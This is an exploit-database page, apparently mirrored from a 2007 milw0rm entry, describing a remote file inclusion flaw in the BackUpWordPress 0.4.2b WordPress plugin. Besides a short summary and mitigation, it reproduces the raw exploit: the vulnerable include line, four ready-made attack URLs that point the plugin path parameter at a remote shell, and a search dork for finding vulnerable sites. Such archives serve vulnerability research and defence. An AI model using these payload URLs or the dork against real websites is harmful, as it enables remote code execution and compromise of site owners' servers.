header-logo
Suggest Exploit
vendor:
BackUpWordPress
by:
S.W.A.T.
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: BackUpWordPress
Affected Version From: 0.4.2b
Affected Version To: 0.4.2b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include arbitrary files from a remote server.

Mitigation:

Update to a version higher than 0.4.2b
Source

Exploit-DB raw data:

--------------------------------- [ Xmors Underground Team ! ] --------------------------------------

Title : BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------
#Author: S.W.A.T.


#cont@ct: svvateam@yahoo.com

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  BackUpWordPress 0.4.2b

Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

--------------------------------------------------------------------------------
Vuln :

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

& other Files & Folders In The [Archive] Folder

--------------------------------------------------------------------------------

Dork:

"inurl:/plugins/BackUp"

--------------------------------------------------------------------------------



--------------------------------- [http://www.xmors.com ] --------------------------------------

# milw0rm.com [2007-11-01]

Navigation

Suggest Exploit

Services By CQR